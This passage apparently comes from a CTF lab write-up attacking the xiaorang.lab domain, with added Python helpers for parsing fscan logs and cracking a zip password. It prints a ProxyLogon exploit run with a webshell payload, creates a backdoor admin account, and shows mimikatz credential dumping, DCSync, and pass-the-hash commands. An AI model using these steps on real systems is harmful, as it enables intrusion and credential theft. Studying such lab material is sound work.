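Reading a role out of a 300-line fscan log by eye is error-prone, so here is an added Python helper (not part of the write-up or of fscan) that folds the log into a per-host port map and derives the same three roles from the evidence: Kerberos plus LDAP or fscan's DC: tag means domain controller, an Exchange SMTP banner means Exchange, and 445/3389 are noted for lateral movement. The SAMPLE below is a handful of lines excerpted from the scan above; the regexes accept both fscan's original Chinese labels and the English renderings used in this page:

```python
import re
from collections import defaultdict

# fscan 2.0 labels its lines in Chinese (端口开放 / 服务识别); the English
# alternatives are the renderings used in this write-up, so both forms parse.
_IP = r"(\d+(?:\.\d+){3})"
_PORT = re.compile(r"\[SUCCESS\] (?:端口开放|port open) " + _IP + r":(\d+)")
_SVC = re.compile(r"\[SUCCESS\] (?:服务识别|service identified) " + _IP + r":(\d+) =>\s*(.*)")
_NETBIOS = re.compile(r"\[SUCCESS\] NetBios " + _IP + r" (.+)")


def parse_fscan(log: str) -> dict:
    """host -> {"ports": {port: service string or ""}, "netbios": str or None}"""
    hosts = defaultdict(lambda: {"ports": {}, "netbios": None})
    for line in log.splitlines():
        m = _PORT.search(line)
        if m:
            hosts[m[1]]["ports"].setdefault(int(m[2]), "")
            continue
        m = _SVC.search(line)
        if m:
            hosts[m[1]]["ports"][int(m[2])] = m[3].strip()
            continue
        m = _NETBIOS.search(line)
        if m:
            hosts[m[1]]["netbios"] = m[2].strip()
    return dict(hosts)


def classify(host: dict) -> list:
    """Role hints from port and banner evidence, in a fixed order."""
    ports = host["ports"]
    services = " ".join(ports.values())
    roles = []
    if {88, 389}.issubset(ports) or (host["netbios"] or "").startswith("DC:"):
        roles.append("domain controller")   # Kerberos + LDAP, or fscan's own DC tag
    if "Exchange" in services or {25, 443, 587}.issubset(ports):
        roles.append("exchange")            # Exchange smtpd banner, or the usual port trio
    if 445 in ports:
        roles.append("smb")                 # psexec / smbclient candidate
    if 3389 in ports:
        roles.append("rdp")
    return roles


def summarize(log: str) -> dict:
    return {
        ip: {"roles": classify(h), "ports": sorted(h["ports"]), "netbios": h["netbios"]}
        for ip, h in parse_fscan(log).items()
    }


# Lines excerpted from the scan above (a subset, enough to exercise every rule).
SAMPLE = """\
[2025-04-09 00:51:51] [SUCCESS] 端口开放 172.22.3.9:25
[2025-04-09 00:51:51] [SUCCESS] 端口开放 172.22.3.2:53
[2025-04-09 00:51:51] [SUCCESS] 端口开放 172.22.3.2:88
[2025-04-09 00:51:51] [SUCCESS] 服务识别 172.22.3.9:25 => [smtp] 产品:Microsoft Exchange smtpd 系统:Windows
[2025-04-09 00:51:55] [SUCCESS] 端口开放 172.22.3.2:389
[2025-04-09 00:51:55] [SUCCESS] 端口开放 172.22.3.26:445
[2025-04-09 00:51:56] [SUCCESS] 服务识别 172.22.3.2:88 =>
[2025-04-09 00:52:00] [SUCCESS] 服务识别 172.22.3.2:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-09 00:52:01] [SUCCESS] 端口开放 172.22.3.26:3389
[2025-04-09 00:55:41] [SUCCESS] NetBios 172.22.3.26 XIAORANG\\XIAORANG-PC
[2025-04-09 00:55:41] [SUCCESS] NetBios 172.22.3.2 DC:XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
"""

if __name__ == "__main__":
    import sys
    log = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE
    for ip, info in sorted(summarize(log).items()):
        print(ip, info["netbios"], info["roles"], info["ports"])
```

Run it on the saved fscan output (python3 fscan_summary.py scan.log) to get one line per host; the role list is what decides the next tool, psexec and smbclient for smb, exprolog for exchange, DCSync targets for the domain controller.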
172.22.3.9 runs Exchange, and this instance is unpatched against the well-known ProxyLogon chain (CVE-2021-26855, a server-side request forgery in the front end, combined with CVE-2021-27065 to write a file through the OAB virtual directory). ExProlog automates the whole chain, so run it straight against the server (through the proxy, like everything else on the internal range):
python .\exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab

___________       __________                .__
\_   _____/__  __\______   \_______  ____ |  |   ____   ____
 |    __)_\  \/  /|     ___/\_  __ \/  _ \|  |  /  _ \ / ___\
 |        \>    < |    |     |  | \(  <_> )  |_(  <_> ) /_/  >
/_______  /__/\_ \|____|     |__|   \____/|____/\____/\___  /
        \/      \/                                   /_____/

[#] Trying to get target FQDN
[+] Got target FQDN: XIAORANG-EXC01
[#] Trying to get target LegacyDN and ServerID
[+] Got target LegacyDN: /o=XIAORANG LAB/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=8ca6ff254802459d9f63ee916eabb487-Administrat
[+] Got target ServerID: b5ebdaa1-b4b3-4b71-ab32-7d03b4955a75
[#] Trying to get target user SID
[+] Got target administrator SID: S-1-5-21-533686307-2117412543-4200729784-500
[#] Trying to get target administrator cookie sessions
[+] Got target administrator session ID: fefab382-b49c-4a85-a748-8cee14485956
[+] Got target administrator canary session ID: atsaGpfQ70qSuQAOEtYUV5LqJeTxeN0IkjUqGKytbR0zbRHwhB5ynGGNyD8fBXd6AyUH2qDHj9M.
[#] Trying to get target OABVirtualDirectory ID
[+] Got target AOB ID: 6d8fb74b-8477-43ee-83ba-0b119205e85f
[#] Trying to inject OABVirtualDirectory Shell
[+] Shell are injected
[#] Verifying OABVirtualDirectory Shell
[+] AOB Shell verified
[+] AOB Shell payload: http:\/\/ooo\/#%3Cscript%20language=%22JScript%22%20runat=%22server%22%3Efunction%20Page_Load()%7Beval(Request%5B%22request%22%5D,%22unsafe%22);%7D%3C\/script%3E
[#] Trying to export OABVirtualDirectory Shell
[+] Shell are exported
[*] CURL Request:
curl --request POST --url https://172.22.3.9/owa/auth/pjo2b.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami /all").stdout.readall())' -k
[*] DONE
The exported webshell gives us command execution. Every request to 172.22.3.9 goes through proxychains from the attack box:
proxychains4 curl --request POST --url https://172.22.3.9/owa/auth/pjo2b.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami").stdout.readall())' -k
The shell runs inside the Exchange OWA application pool, which is SYSTEM, so through the same exec() call add a local administrator and RDP in to collect the flag:
net user xrntkk abc123456 /add
net localgroup administrators xrntkk /add
Yb dP 88 db dP"Yb 88""Yb db 88b 88 dP""b8
 YbdP 88 dPYb dP Yb 88__dP dPYb 88Yb88 dP `"
 dPYb 88 dP__Yb Yb dP 88"Yb dP__Yb 88 Y88 Yb "88
dP Yb 88 dP""""Yb YbodP 88 Yb dP""""Yb 88 Y8 YboodP


 / /
 / / _ __ ( ) ___
 / / // / / // ) ) ) ) / / // ) )
 / / // / / // / / / / / / // / /
/ /____/ / ((___( ( // / / / / / / ((___( (



flag02: flag{aefcc6d0-0d3c-44aa-b96c-c8ad50e6d2d4}
FLAG4
Quick recon on the Exchange box.
It is a domain-joined member of xiaorang.lab.
Next, upload mimikatz and dump the credentials cached in LSASS.
Run mimikatz from an elevated (administrator) prompt; the commands below enable logging to a file, take SeDebugPrivilege and dump logon sessions:
log
privilege::Debug
sekurlsa::logonpasswords
exit
Two usable NT hashes come out:
one for the machine account XIAORANG-EXC01$ and one for the domain user Zhangtong.
Authentication Id : 0 ; 10480581 (00000000:009febc5)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/4/9 20:32:31
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 9b2081c3dc250a9b0a55c54c4dcc9cbb
* SHA1 : 336d62cd7f3bc62aba936763ace82491e96f2eed
Authentication Id : 0 ; 105924 (00000000:00019dc4)
Session : Service from 0
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/4/9 19:36:36
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
Next, collect the domain with BloodHound. Our shell is SYSTEM, whose network identity is the computer account, so authenticate as XIAORANG-EXC01$ with the NT hash just dumped (pass-the-hash over NTLM):
proxychains4 bloodhound-python -u "XIAORANG-EXC01$" --hashes :9b2081c3dc250a9b0a55c54c4dcc9cbb -d xiaorang.lab -dc XIAORANG-WIN16.xiaorang.lab -c all --dns-tcp -ns 172.22.3.2 --auth-method ntlm --zip
BloodHound shows that XIAORANG-EXC01$ ends up with WriteDacl on the domain object itself. That is the classic Exchange shared-permissions problem: an Exchange server's computer account is a member of Exchange Trusted Subsystem, which is nested in Exchange Windows Permissions, and that group holds WriteDacl on DC=xiaorang,DC=lab. WriteDacl on the domain head lets us grant any principal the two replication rights that DCSync needs (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), so we grant them to the machine account itself and pull the domain administrator's hash out of the DC:
python dacledit.py xiaorang.lab/XIAORANG-EXC01$ -hashes :9b2081c3dc250a9b0a55c54c4dcc9cbb -action write -rights DCSync -principal XIAORANG-EXC01$ -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2
With those rights in place the machine account can DCSync. The author reconnects to the Exchange server with psexec (pass-the-hash as XIAORANG-EXC01$) and runs mimikatz's lsadump::dcsync from there, which replicates every account's secrets from XIAORANG-WIN16:
proxychains4 python3 psexec.py xiaorang.lab/XIAORANG-EXC01\$@172.22.3.9 -hashes ':9b2081c3dc250a9b0a55c54c4dcc9cbb' -codec gbk
c:\> .\mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'XIAORANG-WIN16.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt b8fa79a52e918cb0cbcd1c0ede492647 514
1137 HealthMailboxeda7a84 1e89e23e265bb7b54dc87938b1b1a131 66048
1138 HealthMailbox33b01cf 0eff3de35019c2ee10b68f48941ac50d 66048
1139 HealthMailbox9570292 e434c7db0f0a09de83f3d7df25ec2d2f 66048
1140 HealthMailbox3479a75 c43965ecaa92be22c918e2604e7fbea0 66048
1141 HealthMailbox2d45c5b 4822b67394d6d93980f8e681c452be21 66048
1142 HealthMailboxec2d542 147734fa059848c67553dc663782e899 66048
1143 HealthMailboxf5f7dbd e7e4f69b43b92fb37d8e9b20848e6b66 66048
1144 HealthMailbox67dc103 4fe68d094e3e797cfc4097e5cca772eb 66048
1145 HealthMailbox320fc73 0c3d5e9fa0b8e7a830fcf5acaebe2102 66048
1146 Lumia 862976f8b23c13529c2fb1428e710296 512
500 Administrator 7acbc09a6c0efd81bfa7d5a1d4238beb 512
1000 XIAORANG-WIN16$ 5410e4604b240a6d7bab43f67637b109 532480
1147 Zhangtong 22c7f81993e96ac83ac2f3f1903de8b4 512
1103 XIAORANG-EXC01$ 9b2081c3dc250a9b0a55c54c4dcc9cbb 4096
1104 XIAORANG-PC$ fc840d385551c896c88c32a65ab5c5ad 4096
1135 HealthMailbox8446c5b a79a671473279d21ca92fcc8251ec143 66048
1136 HealthMailbox0d5918e 0e9b8e002d34d405e866b4820dfe36eb 66048
mimikatz(commandline) # exit
Bye!
With the domain administrator's NT hash we can move laterally wherever NTLM is accepted, without ever needing the cleartext password:
500 Administrator 7acbc09a6c0efd81bfa7d5a1d4238beb 512
Pass the hash to the domain controller and read the flag:
proxychains4 python3 psexec.py administrator@172.22.3.2 -hashes ':7acbc09a6c0efd81bfa7d5a1d4238beb' -codec gbk
c:\Users\Administrator\flag> type flag.txt
____ ___.___ _____ ________ __________ _____ _______ ________
\ \/ /| | / _ \ \_____ \\______ \ / _ \ \ \ / _____/
\ / | |/ /_\ \ / | \| _/ / /_\ \ / | \/ \ ___
/ \ | / | \/ | \ | \/ | \/ | \ \_\ \
/___/\ \|___\____|__ /\_______ /____|_ /\____|__ /\____|__ /\______ /
\_/ \/ \/ \/ \/ \/ \/
flag04: flag{204e2d62-c729-4840-8b25-a6c07b6aad44}
Flag 4 obtained.
FLAG3
Next, move laterally to 172.22.3.26 for flag 3. The domain administrator hash also works against its C$ share:
proxychains4 impacket-smbclient -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.26 -dc-ip 172.22.3.2
use C$
cd /users/lumia/desktop
C:\users\lumia\desktop contains a secret.zip; download it with get.
secret.zip holds a flag.docx,
but the archive is password-protected.
The DCSync dump also gave us the NT hash of the domain user Lumia, so we can pass that hash to Exchange and download Lumia's mailbox; pthexchange takes the hash as LM:NT, which is why the LM half is 32 zeros:
1146 Lumia 862976f8b23c13529c2fb1428e710296 512
python pthexchange.py --target https://172.22.3.9 --username Lumia --password "00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296" --action Download
Two emails come down.
The first one carries the same secret.zip as an attachment and says the password is a phone number.
The second one's attachment is a list of names and mobile numbers.
Using those numbers as a wordlist to brute-force the archive, the password is
18763918468
and flag 3 is obtained from flag.docx.
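The last two steps, turning the mailed contact list into a wordlist and trying every number against secret.zip, are a small tool in their own right. The following added Python (not from the write-up) does both with the standard library only; the contact text in CONTACTS is constructed, not the attachment from the lab. It covers the two failure modes a practitioner hits here: a wrong ZipCrypto password can slip past the 1-byte header check about 1 time in 256, which is why every candidate is read to the end so the CRC is verified, and AES-encrypted archives cannot be opened by zipfile at all, so those are reported instead of silently returning nothing:

```python
import re
import zipfile
from typing import Iterable, Optional

# Mainland China mobile numbers: 11 digits, leading 1, second digit 3-9.
# The look-arounds stop the regex from cutting 11 digits out of a longer run.
PHONE_RE = re.compile(r"(?<!\d)1[3-9]\d{9}(?!\d)")


def phones_from_text(text: str) -> list:
    """Every mobile number in a contact dump, de-duplicated, in first-seen order."""
    found = []
    for m in PHONE_RE.finditer(text):
        if m.group(0) not in found:
            found.append(m.group(0))
    return found


def crack_zip(path: str, candidates: Iterable[str], member: Optional[str] = None) -> Optional[str]:
    """Return the first candidate that decrypts `member` (default: first file) with a good CRC."""
    with zipfile.ZipFile(path) as zf:
        if member is None:
            member = next(i.filename for i in zf.infolist() if not i.is_dir())
        for pwd in candidates:
            try:
                with zf.open(member, pwd=pwd.encode()) as fh:
                    while fh.read(1 << 16):   # read everything so the CRC is checked
                        pass
                return pwd
            except (RuntimeError, zipfile.BadZipFile):
                # RuntimeError: ZipCrypto header byte mismatch (wrong password).
                # BadZipFile: header byte matched by chance, CRC failed afterwards.
                continue
            except NotImplementedError:
                raise SystemExit("AES-encrypted zip: zipfile cannot decrypt it; use zip2john + john or pyzipper")
    return None


# Constructed contact dump in the shape of the second email's attachment.
CONTACTS = """\
姓名,手机号
张三,13800138000
李四,15912345678
王五,13800138000
前台,010-12345678
"""

if __name__ == "__main__":
    import sys
    # usage: python3 crackzip.py secret.zip contacts.txt
    text = open(sys.argv[2], encoding="utf-8").read() if len(sys.argv) > 2 else CONTACTS
    wordlist = phones_from_text(text)
    if len(sys.argv) > 1:
        print(crack_zip(sys.argv[1], wordlist))
    else:
        print("\n".join(wordlist))
```

For a larger wordlist or an AES archive, zip2john followed by john or hashcat is the faster route; this script is for the case in the lab, a short list of candidates and a ZipCrypto archive, where a direct attempt is quicker than exporting a hash.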